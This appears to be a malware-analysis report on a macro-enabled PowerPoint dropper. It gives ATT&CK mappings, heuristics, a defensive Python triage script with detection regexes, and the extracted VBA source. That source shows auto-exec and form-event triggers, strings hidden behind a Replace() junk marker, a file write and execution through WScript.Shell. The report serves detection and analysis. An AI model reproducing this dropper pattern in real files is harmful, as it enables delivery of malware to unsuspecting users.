MALICIOUS
Risk Score: 260

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1105 Ingress Tool Transfer
The sample is an OOXML PowerPoint presentation (its VBA project is stored at ppt/vbaProject.bin) whose macro project has three parts: a module NpOUTjS with a mixed-case aUtO_oPeN entry point, a UserForm wRCMTGV, and a class mFaXDHp. Auto_Open does nothing but show the form; the real routine, mLaaUHX, is invoked from the form's UserForm_Terminate event, so the payload runs when the form closes rather than from the entry point itself, and a sandbox that only walks the body of Auto_Open sees a form being displayed. Two caveats on the trigger: PowerPoint, unlike Word and Excel, does not run Auto_Open automatically when a presentation is opened (it honours it for add-ins), so the actual trigger should be confirmed against the slide action settings in the deck; and the mixed-case name is a reminder that auto-exec name matching has to be case-insensitive.

mLaaUHX reads the Tag and ControlTipText properties of the form control YBMgySu, strips a fixed junk marker from each with Replace() (the PrBTmus function), writes the cleaned ControlTipText to the file path obtained from Tag (Open ... For Output, Print #1), and then, if AppActivate cannot find a window titled "Microsoft PowerPoint Services...", creates a WScript.Shell object and calls .Exec("C:\Windows\Explorer " & <path>). "C:\Windows\Explorer " is the command prefix, not the drop location: explorer.exe is handed the dropped file, which it opens with the handler registered for that file's extension. The drop path and the dropped content are not in the extracted VBA source; they live in the UserForm storage inside vbaProject.bin and have to be recovered from the control properties (olevba reports these as VBA form strings). Nothing in the extracted source performs a network download; the Ingress Tool Transfer mapping reflects the expected role of the dropped second stage, which the visible macro does not show. Of the heuristics below, OLE_VBA_SHELL deserves a second look for the same reason: the source contains no bare Shell() call, and process execution goes through WScript.Shell.Exec.
Heuristics (6)

| Finding | Severity | Rule | Description |
|---|---|---|---|
| VBA project inside OOXML (5 related findings) | medium | OOXML_VBA | Document contains a VBA project; VBA macros present |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| WScript.Shell usage | critical | OLE_VBA_WSCRIPT | WScript.Shell usage |
| Auto_Open macro | high | OLE_VBA_AUTO | Auto_Open macro |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
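The summary and the heuristics above describe a two-part pattern: an entry point (Auto_Open or a form event) paired with execution tokens, and a Replace()-based junk marker that hides the real strings in form-control properties. The Python below is an added triage helper, not the analyzer's own code, that applies both ideas to text a tool such as olevba has already extracted: it matches entry points and execution tokens case-insensitively (so aUtO_oPeN and .exEc are caught), harvests the marker literal from the Replace() call and uses it to reveal the hidden form strings, and rebuilds the launch command. The VBA snippet is condensed from the macro preview on this page; the Tag and ControlTipText values, the property-name dictionary keys and the function names are constructed assumptions, because the real control properties are not on the page.

```python
import re

# Constructed sample input: the entry points and dropper routine from the
# macro preview on this page, condensed to the lines that matter.
SAMPLE_VBA = r'''
Public Sub aUtO_oPeN()
    wRCMTGV.Show
End Sub
Private Sub UserForm_Terminate()
    qPeWlgn.mLaaUHX
End Sub
Public Function PrBTmus(rgvSedB)
    PrBTmus = Replace(rgvSedB, "¡N.<k7b{.tNC{[Dz[CZU#]b<7$6(_]", "")
End Function
Sub mLaaUHX()
    Dim axlMMtb As String: axlMMtb = wRCMTGV.YBMgySu.Tag
    Dim uFPzBAL As String: uFPzBAL = PrBTmus(axlMMtb)
    Open uFPzBAL For Output As #1
    Dim WDePJgj As String: WDePJgj = wRCMTGV.YBMgySu.ControlTipText
    Print #1, PrBTmus(WDePJgj)
    Close
    Set zMpiEGl = CreateObject("WScript.Shell")
    Set CvYZXSh = zMpiEGl.exEc("C:\Windows\Explorer " & uFPzBAL)
End Sub
'''

# Hypothetical control properties. The real Tag/ControlTipText live in the
# UserForm storage of vbaProject.bin and are not shown on the page; these are
# constructed to show the junk marker spliced into a path and a payload.
JUNK = "¡N.<k7b{.tNC{[Dz[CZU#]b<7$6(_]"
SAMPLE_FORM_STRINGS = {
    "YBMgySu.Tag": "C:\\Users\\Public\\" + JUNK + "update.vbs",
    "YBMgySu.ControlTipText": 'MsgBox "hypothetical' + JUNK + ' payload"',
}

FLAGS = re.IGNORECASE  # VBA identifiers are case-insensitive; so must the matching be
AUTOEXEC = re.compile(r"\b(auto_?open|auto_?close|autoexec|document_open|workbook_open)\b", FLAGS)
EVENT_TRIGGER = re.compile(r"\b(userform_(initialize|activate|terminate)|\w+_(click|mousemove))\b", FLAGS)
EXEC_TOKENS = {
    "CreateObject": re.compile(r"\bcreateobject\s*\(", FLAGS),
    "WScript.Shell": re.compile(r"wscript\.shell", FLAGS),
    ".Exec(": re.compile(r"\.exec\s*\(", FLAGS),
    "Shell(": re.compile(r"(?<![\w.])shell\s*\(", FLAGS),   # bare VBA Shell(), not WScript.Shell
    "Open ... For Output": re.compile(r"\bopen\b.*\bfor\s+output\b", FLAGS),
    "Print #": re.compile(r"\bprint\s*#", FLAGS),
}
# Replace(var, "<marker>", "") with an empty replacement: the marker is the junk key.
REPLACE_MARKER = re.compile(r'replace\s*\(\s*[\w.]+\s*,\s*"([^"]+)"\s*,\s*""\s*\)', FLAGS)
# String literal concatenated in front of the variable inside .Exec(...).
EXEC_PREFIX = re.compile(r'\.exec\s*\(\s*"([^"]*)"\s*&', FLAGS)


def find_entry_points(source):
    """Auto-exec names and event handlers that can start execution."""
    auto = sorted({m.group(0) for m in AUTOEXEC.finditer(source)})
    events = sorted({m.group(0) for m in EVENT_TRIGGER.finditer(source)})
    return auto, events


def find_exec_tokens(source):
    """Names of the execution / file-write tokens present in the source."""
    return [name for name, rx in EXEC_TOKENS.items() if rx.search(source)]


def reveal_form_strings(form_strings, markers):
    """Undo the Replace()-based hiding. VBA Replace() is binary-compare by
    default, so a plain case-sensitive str.replace matches its behaviour."""
    revealed = {}
    for prop, value in form_strings.items():
        for marker in markers:
            value = value.replace(marker, "")
        revealed[prop] = value
    return revealed


def triage(source, form_strings, path_property="YBMgySu.Tag"):
    """Combine the checks into one report; path_property names the control
    property that this sample uses as the drop path (an assumption)."""
    auto, events = find_entry_points(source)
    execs = find_exec_tokens(source)
    markers = REPLACE_MARKER.findall(source)
    revealed = reveal_form_strings(form_strings, markers)
    prefix = EXEC_PREFIX.search(source)
    command = (prefix.group(1) + revealed[path_property]) if prefix and path_property in revealed else None
    # Mirrors the page's rule: an auto-exec trigger together with execution tokens.
    if (auto or events) and execs:
        verdict = "malicious"
    elif auto or events or execs:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"autoexec": auto, "event_triggers": events, "exec_tokens": execs,
            "markers": markers, "revealed": revealed, "launch_command": command,
            "verdict": verdict}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA, SAMPLE_FORM_STRINGS).items():
        print(f"{key}: {value}")
```

The entry-point list shows why the UserForm_Terminate handler matters: a scanner that only flags Auto_Open would still fire here, but one that only executes Auto_Open and inspects what it calls would see nothing, because the dropper is wired to the form's lifecycle rather than to the entry point.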
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1641 bytes | b70c500fa9b13ab54a479890496f72d4139825c83fddd06783dbcf836927344d |
Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "NpOUTjS"
Public Sub aUtO_oPeN()
wRCMTGV.Show
End Sub
Attribute VB_Name = "wRCMTGV"
Attribute VB_Base = "0{2C7FFF9F-C2FC-494D-968E-1C88A89C380F}{818B8586-A4F2-4C52-BFE5-6E0F44A018DC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public qPeWlgn As New mFaXDHp
Private Sub UserForm_Terminate()
qPeWlgn.mLaaUHX
End Sub
Attribute VB_Name = "mFaXDHp"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function PrBTmus(rgvSedB)
PrBTmus = Replace(rgvSedB, "¡N.<k7b{.tNC{[Dz[CZU#]b<7$6(_]", "")
End Function
Sub mLaaUHX()
Dim axlMMtb As String: axlMMtb = wRCMTGV.YBMgySu.Tag
Dim uFPzBAL As String: uFPzBAL = PrBTmus(axlMMtb)
Open uFPzBAL For Output As #1
Dim WDePJgj As String: WDePJgj = wRCMTGV.YBMgySu.ControlTipText
Dim HvoVwqL As String: HvoVwqL = PrBTmus(WDePJgj)
Print #1, HvoVwqL
Close
On Error Resume Next
AppActivate "Microsoft PowerPoint Services..."
If Err <> 0 Then
Err = 0
Set zMpiEGl = CreateObject("WScript.Shell")
Set CvYZXSh = zMpiEGl.exEc("C:\Windows\Explorer " & uFPzBAL)
If Err <> 0 Then MsgBox "Can't Stop "
End If
End Sub
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: ppt/vbaProject.bin | 53760 bytes | 41406faff6e6215390e24fc5362f12e902e62b2a124d23d4baee42abad122c40 |